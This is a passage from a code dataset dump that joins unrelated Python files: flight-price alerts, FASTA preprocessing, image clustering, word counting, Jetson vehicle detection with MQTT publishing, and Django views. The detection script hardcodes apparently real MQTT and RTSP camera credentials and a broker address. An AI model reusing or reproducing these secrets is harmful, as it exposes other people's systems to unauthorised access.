{response.response}\")\n\nask_ai()\n","repo_name":"Gokuljokul/CustomGPT","sub_path":"trainDataset.py","file_name":"trainDataset.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"15486816267","text":"from datetime import datetime, timedelta\nfrom data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\n\ndata_manager = DataManager()\nsheet_data = data_manager.get_destination_data()\nflight_search = FlightSearch()\nnotification_manager = NotificationManager()\n\nif sheet_data[0][\"iataCode\"] == \"\":\n for row in sheet_data:\n row[\"iataCode\"] = flight_search.get_destination_code(row[\"city\"])\n data_manager.destination_data = sheet_data\n data_manager.update_destination_codes()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_today = datetime.now() + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n destination[\"home\"],\n destination[\"iataCode\"],\n from_time=tomorrow,\n to_time=six_month_from_today,\n nights_in_dst_from=destination[\"minNrOfDays\"],\n nights_in_dst_to=destination[\"maxNrOfDays\"],\n nrOfPersons=destination[\"nrOfPersons\"]\n )\n if flight is None:\n continue\n if flight.price < destination[\"lowestPricePerPerson\"]:\n msg = f\"Low price alert! Only {flight.price} EUR per person to fly from {flight.origin_city}-{flight.origin_airport}\\\n to {flight.destination_city}-{flight.destination_airport} and back, from {flight.out_date} to {flight.return_date}.\"\n if flight.via_city:\n msg += f\"\\nThe flight has a stop-over via {flight.via_city}.\"\n for route in flight.route:\n airline = route[\"airline\"]\n city_code_from = route[\"cityCodeFrom\"]\n city_code_to = route[\"cityCodeTo\"]\n flight_no = route[\"flight_no\"]\n departure = route[\"local_departure\"][:16].replace('T', '_')\n arrival = route[\"local_arrival\"][:16].replace('T', '_')\n msg += f\"\\n {city_code_from}-{city_code_to} {airline}{flight_no} {departure} {arrival}\"\n msg += f\"\\nbooking link: https://www.google.co.uk/flights?hl=en#flt={destination['home']}.{destination['iataCode']}.{flight.out_date}*{destination['iataCode']}.{destination['home']}.{flight.return_date}\"\n\n notification_manager.send_msg(message=msg, lst_emails=destination[\"email\"])","repo_name":"MarcBruyland/flight-deal","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"185811219","text":"import streamlit as st\r\nimport zipfile\r\nfrom Bio import SeqIO\r\nfrom io import StringIO\r\nfrom io import BytesIO\r\nimport random\r\n\r\ndef preprocessing():\r\n st.markdown(\r\n \"\"\"\r\n \r\n \"\"\",\r\n unsafe_allow_html=True,\r\n )\r\n\r\n with open(\"quotes.txt\", \"r\", encoding=\"utf-8\") as f:\r\n file_text = f.read()\r\n quotes = file_text.split(\"\\n\\n\")\r\n\r\n st.title(\"Welcome to the Preprocessing Page!\")\r\n st.subheader(\"Upload your FASTA file\")\r\n uploaded_file = st.file_uploader(\"Upload\", type=[\"fasta\",\"fa\"])\r\n #user_length = st.text_input(\"Enter the legth of the Sequence: \")\r\n col1, col2 = st.columns([1,10])\r\n with col1:\r\n show_submit = st.button(\"Submit\")\r\n with col2:\r\n show_example = st.button(\"Load Example\")\r\n\r\n def load_example_file():\r\n with open(\"example.fasta\",\"rb\") as f:\r\n return BytesIO(f.read())\r\n\r\n def preprocess_sequences(records):\r\n #remove sequences with \"X\"\r\n print(\"Removing the duplicate sequences...\")\r\n records = [r for r in records if \"X\" not in r.seq]\r\n\r\n #remove duplicate sequences\r\n sequences = []\r\n unique_records = []\r\n for record in records:\r\n sequence = str(record.seq)\r\n if sequence not in sequences:\r\n unique_records.append(record)\r\n sequences.append(sequence)\r\n st.write(\"Total number of sequences after removing duplicate sequences is:: \", len(unique_records))\r\n return unique_records\r\n \r\n def filter_sequences(sequences):#, target_length):\r\n print(\"Removing unequal length sequences...\")\r\n filtered_sequences = []\r\n for record in sequences:\r\n #if(len(record.seq) == target_length):\r\n filtered_sequences.append(record)\r\n st.write(\"Total number of sequences after making sequences of equal length is:: \", len(filtered_sequences))\r\n return filtered_sequences\r\n\r\n # Initialize the current index\r\n if \"current_index\" not in st.session_state:\r\n st.session_state.current_index = 0\r\n\r\n st.write(\"\"\"***\"\"\")\r\n\r\n if show_submit:\r\n with st.spinner(\"SAMOSA is cleaning your dataset. Please wait....\"):\r\n with zipfile.ZipFile(\"preprocessed_data.zip\", \"w\") as output_zip:\r\n if(uploaded_file is not None):\r\n stringio = StringIO(uploaded_file.getvalue().decode(\"utf-8\"))\r\n records = list(SeqIO.parse(stringio, \"fasta\"))\r\n st.write(\"Total number of sequences before preprocessing is:: \",len(records))\r\n\r\n #preprocess the sequences\r\n processed_records = preprocess_sequences(records)\r\n sequence_filtered = filter_sequences(processed_records)#,int(user_length))\r\n\r\n #download the preprocessed file\r\n if(len(sequence_filtered)>0):\r\n with StringIO() as output:\r\n SeqIO.write(sequence_filtered, output, \"fasta\")\r\n processed_file = output.getvalue().encode()\r\n\r\n st.download_button(label=\"Download Preprocessed File\", data=processed_file, file_name=\"preprocessed.fasta\", mime=\"application/octet-stream\")\r\n quote = random.choice(quotes)\r\n st.write(quote)\r\n\r\n elif show_example:\r\n with st.spinner(\"SAMOSA is cleaning the example dataset. Please Wait.....\"):\r\n with zipfile.ZipFile(\"example_preprocessed_data.zip\", \"w\") as output_zip:\r\n if(uploaded_file is None):\r\n file_contents = load_example_file()\r\n stringio = StringIO(file_contents.getvalue().decode(\"utf-8\"))\r\n records = list(SeqIO.parse(stringio, \"fasta\"))\r\n st.write(\"Total number of sequences before preprocessing is:: \",len(records))\r\n\r\n processed_records = preprocess_sequences(records)\r\n\r\n if(len(processed_records)>0):\r\n with StringIO() as output:\r\n SeqIO.write(processed_records, output, \"fasta\")\r\n processed_file = output.getvalue().encode()\r\n\r\n st.download_button(label=\"Download Preprocessed Example File\", data=processed_file, file_name=\"preprocessed_example_file.fasta\", mime=\"application/octet-stream\")\r\n\r\n st.write(\"\")\r\n st.write(\"\"\"***\"\"\")\r\n quote = random.choice(quotes)\r\n st.write(quote)\r\n st.write(\"\"\"***\"\"\")\r\n\r\n\r\n","repo_name":"psychedelic2007/biohub_webserver","sub_path":"util/pages/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"12724953013","text":"# \n#\n#\n#\n#\n# This is the script for the technical task for the process in Motor AI.\n# Author: Andrés Prada\n\nimport os, glob, cv2, time\nfrom pathlib import Path\nimport numpy as np\nfrom keras.applications.resnet import ResNet152\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.utils.multiclass import unique_labels\nfrom sklearn import manifold\nfrom sklearn.metrics import confusion_matrix, normalized_mutual_info_score\nimport matplotlib.pyplot as plt\n\n# Importts from other models:\n#\n# from keras import Model\n# from cifar100vgg import cifar100vgg\n# from keras.applications.inception_resnet_v2 import InceptionResNetV2\n# from keras.applications.nasnet import NASNetLarge\n# from keras.applications.vgg16 import VGG16\n# from keras.applications.xception import Xception\n#\n\n\ndef visualize_data(Z, labels, num_clusters):\n\t'''\n\t\tThis function helps to visualize the data performing a dimensionality reduction with TSNE.\n\t'''\n\ttsne = manifold.TSNE(n_components=2, init='pca', random_state=0).fit_transform(Z)\n\tfig = plt.figure()\n\tplt.scatter(tsne[:, 0], tsne[:, 1], s=2, c=labels, cmap=plt.cm.get_cmap(\"jet\", num_clusters))\n\tplt.colorbar(ticks=range(num_clusters))\n\tplt.show()\n\ndef plot_matrix(y_true, y_pred, classes, title=None, cmap=plt.cm.Blues):\n\t\"\"\"\n\t This function plots the matrix true label vs cluster label.\n\t It is edited from https://scikit-learn.org/stable/auto_examples/model_selection/plot_confusion_matrix.html\n\t \"\"\"\n\n\t# Compute confusion matrix\n\tcm = confusion_matrix(y_true, y_pred)\n\n\t# Only use the labels that appear in the data\n\tclasses = classes[unique_labels(y_true, y_pred)]\n\n\tfig, ax = plt.subplots()\n\tim = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n\tax.figure.colorbar(im, ax=ax)\n\t# We want to show all ticks...\n\tax.set(xticks=np.arange(cm.shape[1]), yticks=np.arange(cm.shape[0]), xticklabels=classes, yticklabels=classes, title=title, ylabel='True label', xlabel='Cluster label')\n\t \n\t# Rotate the tick labels and set their alignment.\n\tplt.setp(ax.get_xticklabels(), fontsize=6, rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\tplt.setp(ax.get_yticklabels(), fontsize=6)\n\n\t# Loop over data dimensions and create text annotations.\n\tthresh = cm.max() / 2.\n\tfor i in range(cm.shape[0]):\n\t\tfor j in range(cm.shape[1]):\n\t\t\tif cm[i,j] > 0:\n\t\t\t\tax.text(j, i, cm[i, j], fontsize=6, ha=\"center\", va=\"center\", color=\"white\" if cm[i, j] > thresh else \"black\")\n\tfig.tight_layout()\n\tplt.show()\n\treturn ax\n\nif __name__ == '__main__':\n\n\tstart_time = time.time()\n\t# Open images folder\n\timage_path = \"tsrd-train/\"\n\timage_paths = [str(p)for p in Path(image_path).glob('*.png')]\n\n\t# Extracct labels from image name\n\tlabels = [int(str(p).split(\"/\")[1].split(\"_\")[0][-2:]) for p in image_paths]\n\n\n\t# Commented models. For testing, please check the README to adjust image dimensions and feature vector size\n\n\t#model = Xception(include_top=False, weights='imagenet', pooling='avg')\n\t#model = NASNetLarge(include_top=False, weights='imagenet', pooling='avg')\n\t#model = InceptionResNetV2(include_top=False, weights='imagenet', pooling='avg')\n\t#model = VGG16(include_top=False, weights='imagenet', pooling='avg')\n\t#model = cifar100vgg(train=False)\n\t#my_layer = model.model.layers[56]\n\t#model = Model(model.model.input, outputs=my_layer.output)\n\n\t# Define the model\n\tmodel = ResNet152(include_top=False, weights='imagenet', pooling='avg')\n\tn_clusters = 58\n\tmodel.layers[0].trainable = False\n\tdims = [224,224]\n\tvect_len = 2048\n\n\t# Define list to store vector values\n\tfeature_vects = np.zeros((len(image_paths), vect_len), dtype=float)\n\n\t# Extract vectors\n\tfor idx, img in enumerate(image_paths):\n\t\t# Print\n\t\tprint(\"Extracting vector features for image: \"+str(idx))\n\n\t\t# Load and reshape the image to input to the network\n\t\timg = cv2.resize(cv2.imread(img), (dims[0], dims[1]))\n\n\t\t# Add the 4th dim (1, 224, 224, 3)\n\t\timg = np.expand_dims(img.copy(), axis=0)\n\n\t\t# Predict and store value\n\t\tfeature_vects[idx, :] = model.predict(img).flatten()\n\n\t# Cluster the vectors\n\tclusters = AgglomerativeClustering(n_clusters=n_clusters).fit(feature_vects)\n\n\t# Check running time\n\tprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\t#Evaluate similarity normalized_mutual_info_score\n\tnmi = normalized_mutual_info_score(labels, clusters.labels_, average_method='warn')\n\tprint('Evaluation of similarity with normalized mutual score: ' + str(nmi))\n\n\t# Print true label vs cluster\n\tplot_matrix(labels, clusters.labels_, np.unique(labels), title='Labeled images')\n\n\t# Finally, visualize data\n\tvisualize_data(feature_vects, labels, n_clusters)\n\n\n\n\n\n\n\n\n\n","repo_name":"AndresPrada/clustering-tsrd","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"29199607744","text":"import argparse, sys\nctecka = argparse.ArgumentParser()\n\nctecka.add_argument(\"files\", default=(sys.stdin,), nargs=\"*\", type=argparse.FileType())\nctecka.add_argument(\"--min\", \"-m\", default=-1, type=int)\nctecka.add_argument(\"--ignore-case\", \"-i\", action=\"store_true\")\nctecka.add_argument(\"--alphabetical\", \"-a\", action=\"store_true\")\nctecka.add_argument(\"--output\", \"-o\", default=sys.stdout, type=argparse.FileType(\"w\"))\n\nargs = ctecka.parse_args()\n\ndef spocti_slova(soubory, ignore_case):\n frekvence = {}\n for soubor in soubory:\n with soubor:\n obsah_souboru = \"\".join(soubor.readlines()).split()\n for slovo in obsah_souboru:\n if ignore_case:\n slovo = slovo.lower()\n if slovo not in frekvence:\n frekvence[slovo] = 1\n else:\n frekvence[slovo] += 1\n return frekvence\n\nfrekvence_slov = spocti_slova(args.files, args.ignore_case)\nmaximalni_frekvence = len(str(max(frekvence_slov.values())))\n\nif not args.alphabetical:\n poradi_slov = sorted(frekvence_slov.items(), key=lambda x: (-x[1], x[0]))\nelse:\n poradi_slov = sorted(frekvence_slov.items())\n\nwith args.output as soubor:\n for slovo, pocet in poradi_slov:\n if pocet != -1 and pocet >= args.min:\n soubor.writelines(f\"{str(pocet).rjust(maximalni_frekvence)} {slovo}\\n\")\n","repo_name":"MaximPolak/Python","sub_path":"2021-06-24/Frekvencni_distribuce.py","file_name":"Frekvencni_distribuce.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"44776267798","text":"#\n# https://github.com/dusty-nv/jetson-inference/blob/master/docs/detectnet-console-2.md\n#\n# sudo systemctl status track_detect.service\n# sudo systemctl restart track_detect.service\n# sudo systemctl disable track_detect.service\n# sudo systemctl enable track_detect.service\n# sudo systemctl stop track_detect.service\n# sudo systemctl start track_detect.service\n# tail -f /tmp/jetson.log\n#\n# Importing all the necessary modules\nfrom typing import Counter\nimport jetson.inference\nimport jetson.utils\nimport time\nimport cv2\nimport numpy as np \nfrom datetime import datetime\nfrom tracker import *\nfrom support_functions import *\nimport pandas as pd\nimport paho.mqtt.client as mqtt\nimport sys;\nimport logging;\nimport json;\n\ndef on_connect(client, userdata, flags, rc):\n if rc==0:\n client.connected_flag=True #set flag\n logging.debug(\"paho mqtt client connected ok\")\n elif rc==5:\n logging.debug(\"paho mqtt client not connected, authentication failure\")\n client.bad_connection_flag=True\n else:\n logging.debug(\"paho mqtt client not connected, returned code=%d\",rc)\n client.bad_connection_flag=True\n\nlogging.basicConfig(filename='/tmp/jetson.log', level=logging.DEBUG)\n\nclient_name='Jetson'\nclient = mqtt.Client(client_name)\nhost='130.191.161.21' # broker address\nclient.connected_flag=False\nclient.bad_connection_flag=False\nclient.on_connect=on_connect # bind callback function\nclient.username_pw_set(username=\"starlab\",password=\"starlab!\")\nclient.connect(host, port=1883, keepalive=60, bind_address=\"\")\n\nclient.loop_start() #Start loop\n\nwhile not client.connected_flag and client.bad_connection_flag: #wait in loop\n logging.debug(\"In wait loop\")\n time.sleep(1)\n\nlogging.debug('client.bad_connection_flag: %r',client.bad_connection_flag)\nlogging.debug('client.connected_flag: %r\\n\\n',client.connected_flag)\n\nmsg = f\"started\"\ntopic = f\"pelco/jetson\"\nresult = client.publish(topic, msg)\nstatus = result[0]\nif status == 0:\n logging.debug(f\"Send `{msg}` to topic `{topic}`\")\nelse:\n logging.debug(f\"Failed to send message to topic {topic}\")\n sys.exit()\n\ntracker = EuclideanDistTracker()\n\n# For FPS text need time\ntimeStamp=time.time()\nfpsFilt=0\n\n# Model \n#net = jetson.inference.detectNet(argv=[\"--model=/media/jetson/UGUR_USB_C/models/epoch_max/ssd-mobilenet.onnx\", \"--labels=/media/jetson/UGUR_USB_C/models/april_model/labels.txt\", \"--input-blob=input_0\", \"--output-cvg=scores\", \"--output-bbox=boxes\"], threshold=0.5)\nnet = jetson.inference.detectNet(argv=[\"--model=/home/iot/jetson-inference/python/training/detection/ssd/models/last_model/ssd-mobilenet.onnx\", \"--labels=/home/iot/jetson-inference/python/training/detection/ssd/models/last_model/labels.txt\", \"--input-blob=input_0\", \"--output-cvg=scores\", \"--output-bbox=boxes\"], threshold=0.5)\n\n# Picture Size for display\ndispW=1280\ndispH=720\nflip=2\nfont=cv2.FONT_HERSHEY_SIMPLEX # Font for the texts\n\n# Video Settings\n#cap=cv2.VideoCapture('file:///home/jetson/Desktop/Sample_Video/suv_truck.mp4') #can be changed with any other video source or a file\n\n\ncap=cv2.VideoCapture('rtsp://ued:uU8xwmin@sunray.sdsu.edu/stream2')\n\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, dispW)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, dispH)\ncap.set(cv2.CAP_PROP_FPS, int(3))\n\nresult = cv2.VideoWriter('output.mp4', cv2.VideoWriter_fourcc(*'MP4V'),10, (1280,720))\ndetected_objects = []\nwhile True:\n\n ret, img = cap.read()\n\n if ret == False:\n condition = False\n break\n \n # Image Info to OpenCV\n height=img.shape[0]\n width=img.shape[1]\n\n # Changing the color to Needed format for detection for Nvidia Jetson\n frame=cv2.cvtColor(img,cv2.COLOR_BGR2RGBA).astype(np.float32)\n # Converting the image from Numpy to CUDA\n frame=jetson.utils.cudaFromNumpy(frame)\n\n # Getting Detections for each Frame\n detections=net.Detect(frame, width, height)\n\n \n detection_list = []\n \n for detect in detections:\n # TODO: Uncomment this for all the info for each detection\n print(detect)\n \n # Get all the information from the detection class\n \n ID=detect.ClassID\n top=detect.Top\n left=detect.Left\n bottom=detect.Bottom\n right=detect.Right\n width_d = detect.Width\n height_d = detect.Height\n item=net.GetClassDesc(ID)\n center = detect.Center\n center_x = int(center[0])\n center_y = int(center[1])\n confidence = detect.Confidence\n \n # Getting the center locations in integer format in a tuple\n center = (center_x,center_y)\n \n # Rendering the image\n # * Boundary Box\n img = cv2.rectangle(img,(int(left),int(top)),(int(right),int(bottom)),(0,255,0),2)\n \n # * Center Circles\n img = cv2.circle(img, center, 1, (255,255,255), 10)\n # * Class ID and Confidence Text\n cv2.putText(img,str(item)+\" \"+str(round(detect.Confidence,2)),(int(left)+75,int(top)-15),font,1,(255,255,0),2)\n\n \n detection_list.append([int(left),int(top),int(width_d),int(height_d),item])\n \n currentTime = datetime.now()\n \n print(item)\n\n with open(\"/home/iot/Desktop/app/Detections.txt\", \"a\") as f:\n f.write(\"The current timestamp is: \" + str(datetime.now()))\n f.write(\"\\n\")\n f.write(\"The detection Details are: \" + str(detect))\n f.write(\"\\n\")\n f.write(\"Detected is: \" + str(item))\n f.write(\"\\n\")\n f.close()\n \n data = {\n \"id\": format(detect.ClassID),\n \"top\": \"{:.2f}\".format(detect.Top),\n \"left\": \"{:.2f}\".format(detect.Left),\n \"bottom\": \"{:.2f}\".format(detect.Bottom),\n \"right\": \"{:.2f}\".format(detect.Right),\n \"width_d\": \"{:.2f}\".format(detect.Width),\n \"height_d\": \"{:.2f}\".format(detect.Height),\n \"class\": format(net.GetClassDesc(ID)),\n #\"center\": format(detect.Center),\n \"center_x\": format(int(center[0])),\n \"center_y\": format(int(center[1])),\n \"confidence\": \"{:.2f}\".format(detect.Confidence),\n #\"class\": format(category_index[classes+1]['name']),\n #\"box\": [format(x_min_disp), format(y_min_disp), format(x_max_disp), format(y_max_disp)],\n #\"date\": format(t.month) + '/' + format(t.day) + '/' + format(t.year),\n \"time\": format(currentTime.hour) + ':' + format(currentTime.minute) + ':' + format(currentTime.second)\n #\"frame\": ['height:'+format(height), 'width:'+format(width)],\n #\"score\": \"{:.2f}\".format(score),\n #\"inference_time\": \"{:.4f}\".format(inference_time)\n }\n msg = json.dumps(data)\n topic = f\"pelco/jetson\"\n result = client.publish(topic, msg)\n status = result[0]\n if status == 0:\n logging.debug(f\"Send `{msg}` to topic `{topic}`\")\n else:\n logging.debug(f\"Failed to send message to topic {topic}\")\n\n \n boxes_ids = tracker.update(detection_list)\n \n for box_id in boxes_ids:\n x, y, w, h, id, vehicle_type = box_id\n \n temp = next((obj for obj in detected_objects if obj.id == id), None)\n \n if temp == None:\n detected_objects.append(Detected(x, y, w, h, id, vehicle_type))\n\n else:\n prev_cx, prev_cy = temp.cx, temp.cy\n\n print(prev_cx,prev_cy)\n \n temp.update(x, y, w, h)\n\n print(temp.cx,temp.cy)\n\n img = cv2.circle(img, (prev_cx,prev_cy), 1, (255,0,0), 10)\n img = cv2.arrowedLine(img,(prev_cx,prev_cy),(temp.cx,temp.cy),(0,255,0),2)\n #cv2.putText(img,\"Motion Vector\",(prev_cx+10,prev_cy),font,1,(255,255,0),2)\n temp.get_ingress(datetime.now().strftime(\"%H:%M:%S:%f\"))\n temp.get_exgress(datetime.now().strftime(\"%H:%M:%S:%f\"))\n \n \n cv2.putText(img,\"ID:\"+str(id),(x,y -15),font,1,(2550,0),2)\n\n exgress_times = {}\n ingress_times = {}\n pet_calc = {}\n if len(boxes_ids)>1:\n for box_id in boxes_ids:\n _,_,_,_,id,_ = box_id\n temp = next((obj for obj in detected_objects if obj.id == id), None)\n if temp != None:\n exgress_times[id] = temp.exgress\n ingress_times[id] = temp.ingress\n \n # ! Just Showing some stuff will delete later\n print(\"This is exgress times = \")\n print(exgress_times)\n print(\"This is ingress times = \")\n print(ingress_times)\n \n print(datetime.now())\n tp2 = 650\n for (k1,v1) in exgress_times.items():\n for (k2,v2) in ingress_times.items():\n if k1 != k2:\n if v1 != None and v2 != None:\n pet_calc[k2] = v2 - v1\n pet_text = f\"PET: ID{k2}->ID{k1}={abs(round((v2-v1).total_seconds(),2))}s\"\n print(pet_text)\n cv2.putText(img,pet_text,(900,tp2),font,1,(0,0,255),2)\n tp2 += 30\n\n dt=time.time()-timeStamp\n timeStamp=time.time()\n fps=1/dt\n fpsFilt=.9*fpsFilt + .1*fps\n\n cv2.putText(img,str(round(fpsFilt,1))+' fps',(0,30),font,1,(255,255,0),2)\n\n # Yellow Box\n overlay = img.copy()\n cv2.rectangle(overlay,(150,110),(900,680),(0,255,255),-1)\n alpha = 0.4\n img = image_new = cv2.addWeighted(overlay, alpha, img, 1 - alpha, 0)\n\n # Uncomment for saving the output file \n #result.write(img)\n #cv2.imshow(\"Frame\",img)\n\n #if cv2.waitKey(1) & 0xFF == ord('q'):\n # break\n \ncap.release()\ncv2.destroyAllWindows()\nclient.loop_stop()\n\ndf = pd.DataFrame(columns=['id','vehicle_type','ingress_time','egress_time'])\n\nfor x in detected_objects:\n if x.ingress != None or x.exgress != None:\n\n new_row = {'id':x.id,'vehicle_type':x.vehicle_type, 'ingress_time':x.ingress.strftime(\"%H:%M:%S:%f\"),'egress_time':x.exgress.strftime(\"%H:%M:%S:%f\")}\n df = df.append(new_row,ignore_index=True)\n #print(f\"Object ID {x.id}, Object Type = {x.vehicle_type}, Ingress = {x.ingress.strftime(\"%H:%M:%S:%f\")}, Egress = {x.exgress.strftime(\"%H:%M:%S:%f\")}\")\n\ndf.to_csv(\"results.csv\",index=False)\nprint(df.set_index('id').dropna())\n","repo_name":"cpaolini/itmc","sub_path":"jetson/track_detect.py","file_name":"track_detect.py","file_ext":"py","file_size_in_byte":10271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37617704269","text":"from django.conf import settings\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views import View\nfrom django.views.generic.edit import UpdateView\nfrom django.views.generic.edit import DeleteView\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic import TemplateView\nfrom django.views.generic.base import TemplateResponseMixin\n\nfrom django.db.models import Sum\nfrom django.db.models import Count\nfrom django.db.models import Case, When, Value, IntegerField\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.shortcuts import render, redirect\n\nfrom aps.models import Person\nfrom aps.models import Circle\nfrom aps.models import Role\nfrom aps.models import RoleFiller\n\n\n\n# Helper methods ########################################################################################\n\ndef getObjectsNotInGlassfrog(modelObject, orderBy='name'):\n # get newest import date in db table (as last date of import)\n last_import_date = getLastImportedDate(modelObject)\n object_list = modelObject.objects.filter(last_imported__lt=last_import_date).order_by(orderBy).annotate(is_deleted_in_glassfrog=Value(1, IntegerField()))\n return object_list\n\n\ndef getLastImportedDate(modelObject):\n last_imported_objects = modelObject.objects.order_by('-last_imported')\n if last_imported_objects.exists():\n last_imported_object = last_imported_objects[0]\n last_import_date = last_imported_object.last_imported\n else:\n last_import_date = timezone.now()\n return last_import_date\n\n\ndef sumField(object_list, field_to_sum):\n return round(object_list.aggregate(Sum(field_to_sum))[field_to_sum + '__sum'], 1)\n\n\ndef prepareObjectListContext(object_list, field_to_sum):\n total = 0.0\n if object_list.exists():\n total = sumField(object_list, field_to_sum)\n context = {\n 'total': total,\n 'object_list': object_list\n }\n return context\n\n\ndef preparePersonListContext(object_list):\n # get generic additional context\n context = prepareObjectListContext(object_list, 'contract_fte')\n # add person specific additional context\n try: # can only count/sum when the object_list has related items (i.e. rolefillers) in the query result set. That is not always the case, depending on the query done.\n context['total_roles'] = sumField(object_list, 'rolefiller__count')\n context['total_attention_points'] = sumField(object_list, 'rolefiller__attention_points__sum')\n context['total_utilisation'] = Person.calculate_expected_utilisation_percentage(\n context['total_attention_points'], context['total'])\n except:\n pass # dont worry, if we don't have the totals, we dont show them\n return context\n\n\ndef getAnnotatedPersons():\n return Person.objects.annotate(\n Count('rolefiller'),\n # todo: add Round() function to get rid of rounding errors in the sum function\n # docs: https://docs.djangoproject.com/es/1.10/ref/models/expressions/#func-expressions\n Sum('rolefiller__attention_points'),\n Count('rolefiller__role__circle', distinct=True)\n # only count each circle once, when someone has more than one role in a circle\n )\n\ndef getPersonDetailAdditionalContext(person_object):\n additional_context = {}\n # get data related to this person\n annotated_person_object = getAnnotatedPersons().get(id=person_object.id)\n circles = Circle.objects.filter(roles__rolefiller__person__id=person_object.id).distinct().order_by('name')\n leadlink_roles = RoleFiller.objects.all().filter(role__name=\"Lead Link\").filter(person__id=person_object.id)\n leadlink_circles = []\n\n for circle in circles:\n # get all roles this person has in this circle\n circle.person_roles = RoleFiller.objects.filter(role__circle__id=circle.id, person__id=person_object.id).order_by('role')\n circle.total_attention_points = 0\n for rolefill in circle.person_roles:\n circle.total_attention_points += rolefill.attention_points\n\n circle.total_attention_points = round(circle.total_attention_points, 2) # python can be weird with floats\n\n # if this person is Lead Link of this circle, store this circle in his leadlink_circles list\n if leadlink_roles.filter(role__circle=circle):\n circle.additional_context = prepareSubCircleListContextRecursive(circle_object=circle)\n leadlink_circles.append(circle)\n\n # add data to the additional_context, before it is passed to the template\n additional_context['circle_count'] = annotated_person_object.rolefiller__role__circle__count\n additional_context['rolefiller_count'] = annotated_person_object.rolefiller__count\n additional_context['attention_points_sum'] = annotated_person_object.rolefiller__attention_points__sum\n additional_context['circles'] = circles\n additional_context['circles_leadlink'] = leadlink_circles\n\n return additional_context\n\ndef getCircleDetailAdditionalContext(circle__object):\n last_import_date_rolefiller = getLastImportedDate(RoleFiller)\n additional_context = {}\n # add a breadcrumb list of parent circles\n additional_context['breadcrumbs'] = getBreadCrumbList(circle__object)\n # add data to the additional_context, before it is passed to the template\n # store sub-circles, and their total granted and assigned attention points\n additional_context['circles'] = prepareSubCircleListContextRecursive(circle__object)\n # store rolefillers and their total assigned attention points\n additional_context['rolefillers'] = prepareObjectListContext(\n RoleFiller.objects.filter(role__circle__pk=circle__object.pk).order_by(\"person__name\", \"role__name\").annotate(\n is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_rolefiller,then=Value(1)),default=Value(0),output_field=IntegerField())),\n field_to_sum='attention_points')\n # store total granted, assigned attention points\n additional_context['attention_points_granted'] = circle__object.attention_points # just an alias of the objects property value\n additional_context['attention_points_assigned'] = round(additional_context['circles']['attention_points_assigned'] + additional_context['rolefillers']['total'], 1)\n additional_context['attention_points_balance'] = round(additional_context['attention_points_granted'] - additional_context['attention_points_assigned'], 1)\n # add Unassigned Roles to additional_context\n additional_context['unassigned_roles'] = Role.objects.filter(circle__pk=circle__object.pk, rolefiller__isnull=True)\n return additional_context\n\n\ndef prepareSubCircleListContextRecursive(circle_object=None, circle_list=None, field_to_sum='attention_points', subcircle_list=None):\n last_import_date_circle = getLastImportedDate(Circle)\n if subcircle_list != None:\n sub_circle_list = subcircle_list\n elif circle_object == None:\n if circle_list == None:\n circle_object = getRootCircle() # needed to get attention points\n sub_circle_list = Circle.objects.all().annotate(is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n else:\n sub_circle_list = circle_list\n else:\n sub_circle_list = circle_object.sub_circles.all().annotate(is_deleted_in_glassfrog=Case(When(last_imported__lt=last_import_date_circle,then=Value(1)),default=Value(0),output_field=IntegerField()))\n\n context = {\n 'total': 0,\n 'object_list': sub_circle_list\n }\n # get total assigned attention points within subcircles (recursive)\n total_assigned = 0.0\n for sub_circle in sub_circle_list:\n assigned_in_sub_circle = 0.0\n # add this sub_circles rolefiller assigned points\n circle_rolefiller_list = RoleFiller.objects.filter(role__circle__pk=sub_circle.pk)\n if circle_rolefiller_list.exists():\n assigned_in_sub_circle += sumField(circle_rolefiller_list, field_to_sum)\n else:\n assigned_in_sub_circle += 0\n # add this circles sub-circles assigned points (recursive)\n list_context = prepareSubCircleListContextRecursive(sub_circle, None, field_to_sum)\n assigned_in_sub_circle += list_context['attention_points_assigned']\n total_assigned += assigned_in_sub_circle\n # store values in the sub_circle object, to be retrieved in the template\n sub_circle.attention_points_granted = round(sub_circle.attention_points, 1) # alias\n sub_circle.attention_points_assigned = round(assigned_in_sub_circle, 1)\n sub_circle.attention_points_balance = round(sub_circle.attention_points_granted - sub_circle.attention_points_assigned, 1)\n # Add additional circle list specific data to the circle object, to retrieve in the template\n context['attention_points_granted'] = round(context['total'], 1) # alias for conveneance\n context['attention_points_assigned'] = round(total_assigned, 1)\n context['attention_points_balance'] = round(context['total'] - total_assigned, 1)\n # context['total_assigned'] = total_assigned\n # context['total_balance'] = circle_object.attention_points - total_assigned\n return context\n\n\ndef getRootCircle():\n # query all circles without a super-circle. These could also be deleted circles\n # therefore we inverse order by glassfrog ID, as the root circle has PROBABLY the lowest glassfrog ID.\n root_circle = 